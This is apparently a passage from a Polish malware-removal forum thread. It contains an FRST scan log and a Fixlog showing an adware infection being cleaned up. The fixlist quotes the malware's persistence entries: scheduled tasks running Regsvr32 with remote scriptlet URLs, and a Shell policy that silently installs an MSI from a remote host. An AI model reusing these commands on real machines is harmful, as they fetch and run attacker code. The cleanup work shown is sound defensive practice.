CHR HKU\S-1-5-21-1070030570-2694662635-206350218-1001\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [mjbepbhonbojpoaenhckjocchgfiaofo] - hxxps://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [efaidnbmnnnibpcajpcglclefindmkaj] - hxxps://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [eofcbnmajmjmplflapaojjnihcjkigck] - C:\Program Files\AVAST Software\Avast\WebRep\Chrome\aswWebRepChromeSp.crx <nie znaleziono>
CHR HKLM-x32\...\Chrome\Extension: [fheoggkfdfchfphceeifdbepaooicaho] - C:\Program Files (x86)\McAfee\SiteAdvisor\McChPlg.crx <nie znaleziono>
CHR HKLM-x32\...\Chrome\Extension: [gomekmidlodglbbmalcneegieacbdmki] - C:\Program Files\AVAST Software\Avast\WebRep\Chrome\aswWebRepChrome.crx <nie znaleziono>

==================== Usługi (filtrowane) ====================

(Załączenie wejścia w fixlist spowoduje jego usunięcie z rejestru. Powiązany plik nie zostanie przeniesiony, o ile nie zostanie załączony z osobna.)

R2 asComSvc; C:\Program Files (x86)\ASUS\AXSP\1.01.02\atkexComSvc.exe [936728 2013-05-07] ()
R3 aswbIDSAgent; C:\Program Files\AVAST Software\Avast\x64\aswidsagenta.exe [7398336 2017-04-04] (AVAST Software s.r.o.)
R2 avast! Antivirus; C:\Program Files\AVAST Software\Avast\AvastSvc.exe [261712 2017-04-04] (AVAST Software)
S2 AxAutoMntSrv; C:\Program Files (x86)\Alcohol Soft\Alcohol 120\AxAutoMntSrv.exe [39376 2015-03-12] (Alcohol Soft Development Team)
S2 dbupdate; C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe [143144 2016-06-13] (Dropbox, Inc.)
S3 dbupdatem; C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe [143144 2016-06-13] (Dropbox, Inc.)
R2 DbxSvc; C:\Windows\system32\DbxSvc.exe [48944 2017-04-17] (Dropbox, Inc.)
S3 Disc Soft Lite Bus Service; C:\Program Files\DAEMON Tools Lite\DiscSoftBusService.exe [1277680 2015-03-31] (Disc Soft Ltd)
R2 EaseUS Agent; C:\Program Files (x86)\EaseUS\Todo Backup\bin\Agent.exe [37416 2014-12-15] (CHENGDU YIWO Tech Development Co., Ltd)
R2 IAStorDataMgrSvc; C:\Program Files\Intel\Intel(R) Rapid Storage Technology\IAStorDataMgrSvc.exe [15720 2013-08-07] (Intel Corporation)
R2 Intel(R) Capability Licensing Service Interface; C:\Program Files\Intel\iCLS Client\HeciServer.exe [747520 2013-08-27] (Intel(R) Corporation) [Brak podpisu cyfrowego]
S3 Intel(R) Capability Licensing Service TCP IP Interface; C:\Program Files\Intel\iCLS Client\SocketHeciServer.exe [828376 2013-08-27] (Intel(R) Corporation)
R2 ISCTAgent; C:\Program Files\Intel\Intel(R) Smart Connect Technology Agent\iSCTAgent.exe [209712 2014-08-25] ()
R2 jhi_service; C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\jhi_service.exe [154584 2014-09-03] (Intel Corporation)
S3 McComponentHostService; C:\Program Files\McAfee Security Scan\3.11.163\McCHSvc.exe [289256 2015-07-31] (McAfee, Inc.)
R2 MSI_Trigger_Service; C:\Program Files (x86)\MSI\MSITrigger\MSI_Trigger_Service.exe [30240 2013-09-26] (MICRO-STAR INTERNATIONAL CO., LTD.)
S3 PAExec; C:\Windows\PAExec.exe [189112 2017-03-22] (Power Admin LLC)
R2 SSSvc; C:\Program Files (x86)\ScreenShot\SSSvc.exe [139744 2016-11-02] (Filseclab Corporation Limited)
R2 StarWindServiceAE; C:\Program Files (x86)\Alcohol Soft\Alcohol 120\StarWind\StarWindServiceAE.exe [370688 2009-12-23] (StarWind Software) [Brak podpisu cyfrowego]
R2 TuneUp.UtilitiesSvc; C:\Program Files (x86)\AVG\AVG PC TuneUp\TuneUpUtilitiesService64.exe [2589496 2014-10-17] (AVG Technologies)
S3 WdNisSvc; C:\Program Files\Windows Defender\NisSrv.exe [366552 2015-07-07] (Microsoft Corporation)
S3 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [23824 2015-07-07] (Microsoft Corporation)

===================== Sterowniki (filtrowane) ======================

(Załączenie wejścia w fixlist spowoduje jego usunięcie z rejestru. Powiązany plik nie zostanie przeniesiony, o ile nie zostanie załączony z osobna.)

S0 amdkmafd; C:\Windows\System32\drivers\amdkmafd.sys [21160 2012-09-23] (Advanced Micro Devices, Inc.)
R1 AsIO; C:\Windows\SysWow64\drivers\AsIO.sys [15232 2012-08-22] ()
R1 aswbidsdriver; C:\Windows\system32\drivers\aswbidsdrivera.sys [307736 2017-04-04] (AVAST Software s.r.o.)
R0 aswbidsh; C:\Windows\system32\drivers\aswbidsha.sys [189768 2017-04-04] (AVAST Software s.r.o.)
R0 aswblog; C:\Windows\system32\drivers\aswbloga.sys [334088 2017-04-04] (AVAST Software s.r.o.)
R0 aswbuniv; C:\Windows\system32\drivers\aswbuniva.sys [48528 2017-04-04] (AVAST Software s.r.o.)
S3 aswHwid; C:\Windows\system32\drivers\aswHwid.sys [38296 2017-04-04] (AVAST Software)
R1 aswKbd; C:\Windows\system32\drivers\aswKbd.sys [32600 2017-04-04] (AVAST Software)
R2 aswMonFlt; C:\Windows\system32\drivers\aswMonFlt.sys [127112 2017-04-04] (AVAST Software)
R1 aswRdr; C:\Windows\system32\drivers\aswRdr2.sys [101152 2017-04-04] (AVAST Software)
R0 aswRvrt; C:\Windows\system32\drivers\aswRvrt.sys [75704 2017-04-04] (AVAST Software)
R1 aswSnx; C:\Windows\system32\drivers\aswSnx.sys [1005048 2017-04-04] (AVAST Software)
R1 aswSP; C:\Windows\system32\drivers\aswSP.sys [556784 2017-04-04] (AVAST Software)
R2 aswStm; C:\Windows\system32\drivers\aswStm.sys [164064 2017-04-04] (AVAST Software)
R0 aswVmm; C:\Windows\system32\drivers\aswVmm.sys [339696 2017-04-04] (AVAST Software)
R3 AtiHDAudioService; C:\Windows\system32\drivers\AtihdWB6.sys [118848 2016-08-09] (Advanced Micro Devices)
U3 axscsidrv; C:\Windows\System32\Drivers\axscsidrv.sys [304296 2015-11-23] (Alcohol Soft Development Team)
S3 dot4; C:\Windows\system32\DRIVERS\Dot4.sys [151968 2012-10-19] (Windows (R) Win 7 DDK provider)
S3 Dot4Print; C:\Windows\System32\drivers\Dot4Prt.sys [27040 2012-10-19] (Windows (R) Win 7 DDK provider)
R3 dtlitescsibus; C:\Windows\System32\drivers\dtlitescsibus.sys [30352 2015-04-20] (Disc Soft Ltd)
S3 epmntdrv; C:\Windows\system32\epmntdrv.sys [18528 2014-11-18] ()
S3 epmntdrv; C:\Windows\SysWOW64\epmntdrv.sys [14944 2014-11-18] ()
R0 EUBKMON; C:\Windows\System32\drivers\EUBKMON.sys [48168 2014-12-15] ()
S3 EuGdiDrv; C:\Windows\system32\EuGdiDrv.sys [10848 2014-11-18] ()
S3 EuGdiDrv; C:\Windows\SysWOW64\EuGdiDrv.sys [10208 2014-11-18] ()
S3 igfx; C:\Windows\system32\DRIVERS\igdkmd64.sys [3729920 2014-03-07] (Intel Corporation) [Brak podpisu cyfrowego]
R3 ikbevent; C:\Windows\system32\DRIVERS\ikbevent.sys [22216 2014-05-27] ()
R3 imsevent; C:\Windows\system32\DRIVERS\imsevent.sys [22728 2014-05-27] ()
R3 INETMON; C:\Windows\System32\Drivers\INETMON.sys [25800 2014-05-27] ()
R3 ISCT; C:\Windows\System32\drivers\ISCTD.sys [44744 2014-05-27] ()
R3 MEIx64; C:\Windows\system32\DRIVERS\TeeDriverx64.sys [126976 2014-09-03] (Intel Corporation)
S3 mfeaack; C:\Windows\System32\drivers\mfeaack.sys [368904 2014-12-19] (McAfee, Inc.)
R0 mfedisk; C:\Windows\System32\DRIVERS\mfedisk.sys [100080 2014-12-19] (McAfee, Inc.)
S3 mfencrk; C:\Windows\system32\DRIVERS\mfencrk.sys [100720 2014-11-08] (McAfee, Inc.)
S3 pfc; C:\Windows\SysWOW64\drivers\pfc.sys [9856 2015-02-28] (Padus, Inc.) [Brak podpisu cyfrowego]
R0 sptd; C:\Windows\System32\Drivers\sptd.sys [381608 2015-11-23] (Duplex Secure Ltd.)
R3 TuneUpUtilitiesDrv; C:\Program Files (x86)\AVG\AVG PC TuneUp\TuneUpUtilitiesDriver64.sys [14112 2014-09-09] (TuneUp Software)
R1 VBoxNetAdp; C:\Windows\system32\DRIVERS\VBoxNetAdp6.sys [117768 2015-11-10] (Oracle Corporation)
R1 VBoxNetLwf; C:\Windows\system32\DRIVERS\VBoxNetLwf.sys [194976 2015-11-10] (Oracle Corporation)
S3 WdBoot; C:\Windows\system32\drivers\WdBoot.sys [44560 2015-07-07] (Microsoft Corporation)
S3 WdFilter; C:\Windows\system32\drivers\WdFilter.sys [270168 2015-07-07] (Microsoft Corporation)
S3 WdNisDrv; C:\Windows\System32\Drivers\WdNisDrv.sys [114520 2015-07-07] (Microsoft Corporation)

==================== NetSvcs (filtrowane) ===================

(Załączenie wejścia w fixlist spowoduje jego usunięcie z rejestru. Powiązany plik nie zostanie przeniesiony, o ile nie zostanie załączony z osobna.)


==================== Jeden miesiÄ…c - utworzone pliki i foldery ========

(Załączenie wejścia w fixlist spowoduje przeniesienie pliku/folderu.)

2017-04-21 10:37 - 2017-04-21 10:59 - 00000000 ____D C:\AdwCleaner
2017-04-21 10:10 - 2017-04-24 13:51 - 00000000 ____D C:\FRST
2017-04-20 14:56 - 2017-04-20 14:56 - 00000000 ____D C:\Program Files (x86)\Mozilla Maintenance Service
2017-04-20 14:56 - 2017-04-20 14:56 - 00000000 ____D C:\Program Files (x86)\Mozilla Firefox
2017-04-20 09:32 - 2017-04-20 09:32 - 00000000 ___HD C:\$AV_ASW
2017-04-20 01:00 - 2017-04-20 01:00 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Dropbox
2017-04-17 17:14 - 2017-04-17 17:14 - 00048944 _____ (Dropbox, Inc.) C:\Windows\system32\DbxSvc.exe
2017-04-17 15:54 - 2017-04-21 10:52 - 00000000 ____D C:\Windows\system32\log
2017-04-17 15:54 - 2017-04-21 10:10 - 00000000 ____D C:\Users\Adam\AppData\LocalLow\Mozilla
2017-04-12 13:48 - 2017-04-12 13:48 - 00000000 ____D C:\Users\Adam\AppData\Roaming\Sun
2017-04-04 20:59 - 2017-04-04 20:59 - 00399944 _____ (AVAST Software) C:\Windows\system32\aswBoot.exe
2017-03-28 09:16 - 2017-03-28 09:16 - 00108623 _____ C:\Users\Adam\AppData\Local\recently-used.xbel

==================== Jeden miesiÄ…c - zmodyfikowane pliki i foldery ========

(Załączenie wejścia w fixlist spowoduje przeniesienie pliku/folderu.)

2017-04-24 13:49 - 2015-02-26 21:39 - 00003596 _____ C:\Windows\System32\Tasks\Optimize Start Menu Cache Files-S-1-5-21-1070030570-2694662635-206350218-1001
2017-04-24 13:44 - 2016-12-21 13:50 - 00020992 ___SH C:\Users\Adam\Desktop\Thumbs.db
2017-04-24 13:44 - 2015-02-26 21:35 - 00000000 ___DO C:\Users\Adam\SkyDrive
2017-04-24 13:43 - 2016-06-13 11:39 - 00001158 _____ C:\Windows\Tasks\DropboxUpdateTaskMachineCore.job
2017-04-24 13:43 - 2016-04-25 17:25 - 00000008 __RSH C:\ProgramData\ntuser.pol
2017-04-24 13:43 - 2013-08-22 16:45 - 00000006 ____H C:\Windows\Tasks\SA.DAT
2017-04-24 13:42 - 2017-03-22 14:28 - 00065536 _____ C:\Windows\system32\spu_storage.bin
2017-04-24 13:42 - 2013-08-22 15:25 - 00262144 ___SH C:\Windows\system32\config\BBI
2017-04-24 13:40 - 2013-08-22 17:36 - 00000000 ___HD C:\Windows\system32\GroupPolicy
2017-04-24 13:40 - 2013-08-22 17:36 - 00000000 ____D C:\Windows\SysWOW64\GroupPolicy
2017-04-24 13:00 - 2016-06-13 11:39 - 00001162 _____ C:\Windows\Tasks\DropboxUpdateTaskMachineUA.job
2017-04-24 11:53 - 2015-02-27 01:03 - 00000000 ____D C:\Users\Adam\AppData\Roaming\GG
2017-04-24 08:54 - 2015-02-26 21:38 - 00003972 _____ C:\Windows\System32\Tasks\User_Feed_Synchronization-{173A4055-B161-4B94-9E49-588ED76C23D3}
2017-04-24 08:53 - 2017-02-24 09:57 - 00003030 _____ C:\Windows\System32\Tasks\RTSS
2017-04-22 18:46 - 2015-03-01 20:39 - 00000000 ____D C:\Users\Adam\AppData\Roaming\vlc
2017-04-22 16:01 - 2013-08-22 17:36 - 00000000 ____D C:\Windows\AppReadiness
2017-04-21 10:52 - 2016-04-03 14:08 - 00001014 _____ C:\Users\Public\Desktop\Avast SafeZone Browser.lnk
2017-04-21 10:52 - 2015-11-23 17:12 - 00000907 _____ C:\Users\Adam\Desktop\AION.lnk
2017-04-21 10:52 - 2015-11-23 17:12 - 00000000 ____D C:\Users\Adam\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\AION
2017-04-21 10:52 - 2015-02-26 21:33 - 00001013 _____ C:\Users\Adam\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk
2017-04-21 10:52 - 2015-02-26 21:33 - 00000983 _____ C:\Users\Adam\Desktop\Internet Explorer.lnk
2017-04-20 14:56 - 2015-10-14 20:27 - 00001137 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk
2017-04-20 14:21 - 2014-05-13 08:56 - 01738750 _____ C:\Windows\system32\PerfStringBackup.INI
2017-04-20 14:21 - 2013-08-23 01:12 - 00770326 _____ C:\Windows\system32\perfh015.dat
2017-04-20 14:21 - 2013-08-23 01:12 - 00156028 _____ C:\Windows\system32\perfc015.dat
2017-04-20 14:21 - 2013-08-22 15:36 - 00000000 ____D C:\Windows\Inf
2017-04-20 01:01 - 2016-06-13 11:39 - 00000000 ____D C:\Program Files (x86)\Dropbox
2017-04-19 09:18 - 2014-05-13 08:58 - 00000000 ___HD C:\Program Files (x86)\Temp
2017-04-19 01:07 - 2015-02-26 21:33 - 00000000 ____D C:\Users\Adam
2017-04-13 18:04 - 2017-02-28 14:39 - 00000000 ____D C:\Users\Adam\AppData\Roaming\ScreenShot
2017-04-13 17:59 - 2016-04-03 14:08 - 00003956 _____ C:\Windows\System32\Tasks\SafeZone scheduled Autoupdate 1459685331
2017-04-13 17:59 - 2016-04-03 14:08 - 00001065 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Avast SafeZone Browser.lnk
2017-04-13 17:58 - 2015-02-28 17:56 - 00000000 ____D C:\Program Files\WinRAR
2017-04-12 13:48 - 2015-03-01 20:39 - 00000508 _____ C:\Users\Public\Desktop\VLC media player.lnk
2017-04-12 13:48 - 2015-02-28 17:56 - 00001110 _____ C:\ProgramData\Microsoft\Windows\Start Menu\WinRAR.lnk
2017-04-12 13:48 - 2015-02-28 17:56 - 00000000 ____D C:\Users\Adam\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\WinRAR
2017-04-12 13:48 - 2015-02-28 17:56 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\WinRAR
2017-04-12 13:47 - 2015-03-01 12:25 - 00097856 _____ (Oracle Corporation) C:\Windows\SysWOW64\WindowsAccessBridge-32.dll
2017-04-12 13:47 - 2015-03-01 12:25 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Java
2017-04-12 13:47 - 2015-03-01 12:24 - 00000000 ____D C:\Program Files (x86)\Java
2017-04-12 13:46 - 2015-11-23 17:16 - 00000000 ____D C:\Program Files (x86)\Smart File Advisor
2017-04-12 12:41 - 2015-04-07 10:09 - 00004476 _____ C:\Windows\System32\Tasks\Adobe Acrobat Update Task
2017-04-12 12:41 - 2015-04-07 10:09 - 00002457 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Acrobat Reader DC.lnk
2017-04-11 19:16 - 2015-02-27 00:07 - 00003480 _____ C:\Windows\System32\Tasks\GoogleUpdateTaskMachineUA
2017-04-11 19:16 - 2015-02-27 00:07 - 00003352 _____ C:\Windows\System32\Tasks\GoogleUpdateTaskMachineCore
2017-04-11 14:23 - 2017-02-26 19:42 - 00004388 _____ C:\Windows\System32\Tasks\Adobe Flash Player Updater
2017-04-11 14:23 - 2013-08-22 17:36 - 00000000 ____D C:\Windows\SysWOW64\Macromed
2017-04-11 14:23 - 2013-08-22 17:36 - 00000000 ____D C:\Windows\system32\Macromed
2017-04-04 21:00 - 2017-03-09 22:09 - 00003914 _____ C:\Windows\System32\Tasks\Avast Emergency Update
2017-04-04 20:59 - 2016-04-03 14:07 - 00032600 _____ (AVAST Software) C:\Windows\system32\Drivers\aswKbd.sys
2017-04-04 20:59 - 2015-03-19 18:49 - 01005048 _____ (AVAST Software) C:\Windows\system32\Drivers\aswSnx.sys
2017-04-04 20:59 - 2015-03-19 18:49 - 00556784 _____ (AVAST Software) C:\Windows\system32\Drivers\aswSP.sys
2017-04-04 20:59 - 2015-03-19 18:49 - 00339696 _____ (AVAST Software) C:\Windows\system32\Drivers\aswVmm.sys
2017-04-04 20:59 - 2015-03-19 18:49 - 00164064 _____ (AVAST Software) C:\Windows\system32\Drivers\aswStm.sys
2017-04-04 20:59 - 2015-03-19 18:49 - 00127112 _____ (AVAST Software) C:\Windows\system32\Drivers\aswMonFlt.sys
2017-04-04 20:59 - 2015-03-19 18:49 - 00101152 _____ (AVAST Software) C:\Windows\system32\Drivers\aswRdr2.sys
2017-04-04 20:59 - 2015-03-19 18:49 - 00075704 _____ (AVAST Software) C:\Windows\system32\Drivers\aswRvrt.sys
2017-04-04 20:59 - 2015-03-19 18:49 - 00038296 _____ (AVAST Software) C:\Windows\system32\Drivers\aswHwid.sys
2017-04-04 20:58 - 2017-03-09 22:09 - 00334088 _____ (AVAST Software s.r.o.) C:\Windows\system32\Drivers\aswbloga.sys
2017-04-04 20:58 - 2017-03-09 22:09 - 00307736 _____ (AVAST Software s.r.o.) C:\Windows\system32\Drivers\aswbidsdrivera.sys
2017-04-04 20:58 - 2017-03-09 22:09 - 00189768 _____ (AVAST Software s.r.o.) C:\Windows\system32\Drivers\aswbidsha.sys
2017-04-04 20:58 - 2017-03-09 22:09 - 00048528 _____ (AVAST Software s.r.o.) C:\Windows\system32\Drivers\aswbuniva.sys
2017-03-30 19:16 - 2015-03-23 10:08 - 00002024 _____ C:\Users\Public\Desktop\Google Slides.lnk
2017-03-30 19:16 - 2015-03-23 10:08 - 00002022 _____ C:\Users\Public\Desktop\Google Sheets.lnk
2017-03-30 19:16 - 2015-03-23 10:08 - 00002012 _____ C:\Users\Public\Desktop\Google Docs.lnk
2017-03-30 19:16 - 2015-03-23 10:08 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Drive
2017-03-28 11:10 - 2015-05-15 16:24 - 00000000 ____D C:\Users\Adam\.gimp-2.8
2017-03-28 09:16 - 2015-05-15 16:27 - 00000000 ____D C:\Users\Adam\AppData\Local\gtk-2.0
2017-03-27 20:59 - 2015-03-19 18:48 - 00000000 ____D C:\ProgramData\AVAST Software

==================== Pliki w katalogu głównym wybranych folderów =======

2015-03-29 23:34 - 2016-01-10 10:55 - 2128896 _____ () C:\Users\Adam\AppData\Local\file__0.localstorage
2015-09-17 23:53 - 2015-09-17 23:53 - 0000600 _____ () C:\Users\Adam\AppData\Local\PUTTY.RND
2017-03-28 09:16 - 2017-03-28 09:16 - 0108623 _____ () C:\Users\Adam\AppData\Local\recently-used.xbel
2015-02-26 21:54 - 2015-11-22 22:57 - 0007597 _____ () C:\Users\Adam\AppData\Local\resmon.resmoncfg
2014-05-13 08:59 - 2014-05-13 08:59 - 0000000 ____H () C:\ProgramData\DP45977C.lfl

==================== Bamital & volsnap ======================

(Brak automatycznej naprawy dla plików które nie przeszły weryfikacji.)

C:\Windows\system32\winlogon.exe => Plik podpisany cyfrowo
C:\Windows\system32\wininit.exe => Plik podpisany cyfrowo
C:\Windows\explorer.exe => Plik podpisany cyfrowo
C:\Windows\SysWOW64\explorer.exe => Plik podpisany cyfrowo
C:\Windows\system32\svchost.exe => Plik podpisany cyfrowo
C:\Windows\SysWOW64\svchost.exe => Plik podpisany cyfrowo
C:\Windows\system32\services.exe => Plik podpisany cyfrowo
C:\Windows\system32\User32.dll => Plik podpisany cyfrowo
C:\Windows\SysWOW64\User32.dll => Plik podpisany cyfrowo
C:\Windows\system32\userinit.exe => Plik podpisany cyfrowo
C:\Windows\SysWOW64\userinit.exe => Plik podpisany cyfrowo
C:\Windows\system32\rpcss.dll => Plik podpisany cyfrowo
C:\Windows\system32\dnsapi.dll => Plik podpisany cyfrowo
C:\Windows\SysWOW64\dnsapi.dll => Plik podpisany cyfrowo
C:\Windows\system32\Drivers\volsnap.sys => Plik podpisany cyfrowo

LastRegBack: 2017-04-21 09:32

==================== Koniec  FRST.txt ============================]


I ten po restarcie utworzył mi się z naprawy.
Fixlog
Kod: Zaznacz wszystko
Rezultat naprawy Farbar Recovery Scan Tool (x64) Wersja: 23-04-2017 01
Uruchomiony przez Adam (24-04-2017 13:36:25) Run:1
Uruchomiony z F:\wiro
Załadowane profile: Adam (Dostępne profile: Adam & Administrator)
Tryb startu: Normal
==============================================

fixlist - zawartość:
*****************
Task: {7EEA6424-BBCF-4ECA-8DE2-B51166346CB6} - System32\Tasks\PowerWord-SCT-JT => Regsvr32.exe /s /i:hxxp://point.lbyhbyc.com/?data=zDlkMj81MdkcFTJYOTNYRWY1MTE5FjQSMWZXOUNLOTFyOWVWFF== scrobj.dll
Task: {BAB785D2-B667-49B6-83DC-099BD0D65BE3} - System32\Tasks\Windows-WoShiBeiYongDe => Regsvr32.exe /s /i:hxxp://u76wtn6.x.incapdns.net/?data=zDlkMj81MdkcFTJYOTNYRWY1MTE5FjQSMWZXOUNLOTFyOWVWFF== scrobj.dll
C:\Users\Adam\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk
C:\Users\Adam\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.lnk
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
C:\Users\Public\Desktop\Google Chrome.lnk
RemoveDirectory: C:\Program Files (x86)\Eastness
RemoveDirectory: C:\Program Files (x86)\Firefox
RemoveDirectory: C:\Program Files (x86)\MIO
RemoveDirectory: C:\Program Files (x86)\MyPC Backup
RemoveDirectory: C:\Users\Adam\AppData\Roaming\SSMgre
RemoveDirectory: C:\Program Files (x86)\BiaoJi
RemoveDirectory: C:\ProgramData\Software
RemoveDirectory: C:\Users\Adam\AppData\Local\Eastness
RemoveDirectory: C:\Program Files (x86)\Elex-tech
RemoveDirectory: C:\Users\Adam\AppData\Roaming\Elex-tech
RemoveDirectory: C:\Program Files\MK
RemoveDirectory: C:\Users\Adam\AppData\Local\3DM
FirewallRules: [{45E1A9CB-3A83-405D-A7A1-1467833BDE58}] => (Allow) C:\Program Files (x86)\Eastness\Application\chrome.exe
FirewallRules: [{0622DF48-9942-4C07-8A38-969F01B16F50}] => (Allow) C:\Program Files (x86)\Firefox\bin\FirefoxUpdate.exe
FirewallRules: [{4DB7B6EB-50A0-49FE-8C66-D2330DD0CDC4}] => (Allow) C:\Program Files (x86)\Firefox\Firefox.exe
FirewallRules: [{45E1A9CB-3A83-405D-A7A1-1467833BDE58}] => (Allow) C:\Program Files (x86)\Eastness\Application\chrome.exe
FirewallRules: [{E32899BB-DB0B-4992-885D-1DE33CD6200D}] => (Allow) C:\Program Files (x86)\MIO\loader\st1000dm003-1er162_z4y42ghsxxxxz4y42ghs.dat
FirewallRules: [{5818BB2E-18C6-4808-9E91-566A6BEE8ED8}] => (Allow) C:\Program Files (x86)\MIO\loader\st1000dm003-1er162_z4y42ghsxxxxz4y42ghs.dat
2017-04-20 09:24 - 2017-04-20 09:24 - 00000000 _____ C:\Windows\SysWOW64\22
2017-04-20 09:24 - 2017-04-20 09:24 - 00000000 _____ C:\Windows\SysWOW64\11
S3 ALSysIO; \??\C:\Users\Adam\AppData\Local\Temp\ALSysIO64.sys [X] <==== UWAGA
S3 dbx; system32\DRIVERS\dbx.sys [X]
S3 intaud_WaveExtensible; \SystemRoot\system32\drivers\intelaud.sys [X]
S3 iwdbus; \SystemRoot\System32\drivers\iwdbus.sys [X]
S3 NTIOLib_1_0_C; \??\D:\NTIOLib_X64.sys [X]
S3 VBoxNetFlt; \SystemRoot\system32\DRIVERS\VBoxNetFlt.sys [X]
R1 iSafeKrnl; C:\Program Files (x86)\Elex-tech\YAC\iSafeKrnl.sys [262344 2016-05-23] (Elex do Brasil cenzura!ções Ltda) <==== UWAGA
S2 AppleNotificationsSrv; C:\ProgramData\Software\Apple\Apps\Notification.dll [X]
S2 mfemms; "C:\Program Files\Common Files\McAfee\SystemCore\\mfemms.exe" [X]
C:\ProgramData\Software\Apple\Apps\Notification.dll
CHR DefaultSearchURL: Default -> hxxp://www.ourluckysites.com/search/?ty ... 4Y42GHS&q={searchTerms}
CHR DefaultSearchKeyword: Default -> ourluckysites
FF Plugin HKU\S-1-5-21-1070030570-2694662635-206350218-1001: @acestream.net/acestreamplugin,version=3.1.6 -> C:\Users\Adam\AppData\Roaming\ACEStream\player\npace_plugin.dll [Brak pliku]
FF SearchEngineOrder.1: Mozilla\Firefox\Profiles\ti2j30g5.default -> luck
FF SelectedSearchEngine: Mozilla\Firefox\Profiles\ti2j30g5.default -> luck
FF user.js: detected! => C:\Users\Adam\AppData\Roaming\Mozilla\Firefox\Profiles\ti2j30g5.default\user.js [2017-04-21]
FF DefaultSearchEngine: Mozilla\Firefox\Profiles\ti2j30g5.default -> luck
BHO-x32: Brak nazwy -> {B164E929-A1B6-4A06-B104-2CD0E90A88FF} -> Brak pliku
BHO: Brak nazwy -> {B164E929-A1B6-4A06-B104-2CD0E90A88FF} -> Brak pliku
GroupPolicy: Ograniczenia - Chrome <======= UWAGA
IFEO\taskmgr.exe: [Debugger]
HKU\S-1-5-21-1070030570-2694662635-206350218-1001\...\Policies\system: [Shell] explorer.exe,msiexec.exe /i http://point.orangeiloveyou.com/?data=z ... FyOWVWFF== /q
HOSTS:
EmptyTemp:
*****************

HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{7EEA6424-BBCF-4ECA-8DE2-B51166346CB6} => klucz pomyślnie usunięto
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{7EEA6424-BBCF-4ECA-8DE2-B51166346CB6} => klucz pomyślnie usunięto
C:\Windows\System32\Tasks\PowerWord-SCT-JT => pomyślnie przeniesiono
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\PowerWord-SCT-JT => klucz pomyślnie usunięto
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{BAB785D2-B667-49B6-83DC-099BD0D65BE3} => klucz pomyślnie usunięto
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{BAB785D2-B667-49B6-83DC-099BD0D65BE3} => klucz pomyślnie usunięto
C:\Windows\System32\Tasks\Windows-WoShiBeiYongDe => pomyślnie przeniesiono
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Windows-WoShiBeiYongDe => klucz pomyślnie usunięto
C:\Users\Adam\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk => pomyślnie przeniesiono
C:\Users\Adam\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.lnk => pomyślnie przeniesiono
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk => pomyślnie przeniesiono
C:\Users\Public\Desktop\Google Chrome.lnk => pomyślnie przeniesiono
niepowodzenie przy usuwaniu "C:\Program Files (x86)\Eastness\Application\chrome.dll" => Zaplanowany do usunięcia przy restarcie.
niepowodzenie przy usuwaniu "C:\Program Files (x86)\Eastness\Application\chrome.exe" => Zaplanowany do usunięcia przy restarcie.
niepowodzenie przy usuwaniu "C:\Program Files (x86)\Eastness\Application\chrome_100_percent.pak" => Zaplanowany do usunięcia przy restarcie.
niepowodzenie przy usuwaniu "C:\Program Files (x86)\Eastness\Application\chrome_200_percent.pak" => Zaplanowany do usunięcia przy restarcie.
niepowodzenie przy usuwaniu "C:\Program Files (x86)\Eastness\Application\chrome_child.dll" => Zaplanowany do usunięcia przy restarcie.
niepowodzenie przy usuwaniu "C:\Program Files (x86)\Eastness\Application\chrome_elf.dll" => Zaplanowany do usunięcia przy restarcie.
niepowodzenie przy usuwaniu "C:\Program Files (x86)\Eastness\Application\chrome_watcher.dll" => Zaplanowany do usunięcia przy restarcie.
niepowodzenie przy usuwaniu "C:\Program Files (x86)\Eastness\Application\d3dcompiler_47.dll" => Zaplanowany do usunięcia przy restarcie.
niepowodzenie przy usuwaniu "C:\Program Files (x86)\Eastness\Application\icudtl.dat" => Zaplanowany do usunięcia przy restarcie.
niepowodzenie przy usuwaniu "C:\Program Files (x86)\Eastness\Application\libegl.dll" => Zaplanowany do usunięcia przy restarcie.
niepowodzenie przy usuwaniu "C:\Program Files (x86)\Eastness\Application\libglesv2.dll" => Zaplanowany do usunięcia przy restarcie.
niepowodzenie przy usuwaniu "C:\Program Files (x86)\Eastness\Application\locales\pl.pak" => Zaplanowany do usunięcia przy restarcie.
niepowodzenie przy usuwaniu "C:\Program Files (x86)\Eastness\Application\natives_blob.bin" => Zaplanowany do usunięcia przy restarcie.
